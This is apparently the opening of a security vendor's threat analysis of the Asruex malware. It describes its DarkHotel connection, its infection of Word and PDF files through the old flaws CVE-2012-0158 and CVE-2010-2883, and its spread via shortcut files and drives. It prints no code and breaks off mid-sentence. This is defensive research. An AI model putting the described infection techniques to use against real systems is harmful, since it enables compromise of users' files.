By Ian Mercado and Mhica Romero
Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.
The use of old, patched vulnerabilities could hint that the variant was devised knowing that it can affect targets who have been using older versions of Adobe Reader (versions 9.x up to before 9.4) and Acrobat (versions 8.x up to before 8.2.5) on Windows and Mac OS X.
Because of this unique infection capability, security researchers might not consider checking files for an Asruex infection and continue to watch out for its backdoor abilities exclusively. Awareness of this new infection method could help users defend against the malware variant.
Asruex infects a system through a shortcut file that has a PowerShell download script, and spreads through removable drives and network drives. The diagram below illustrates the malware’s infection chain.
Figure 1. Infection chain of Asruex
Infected PDF files
We first encountered this variant as a PDF file. Further investigation revealed that the PDF file itself was not a malicious file created by ..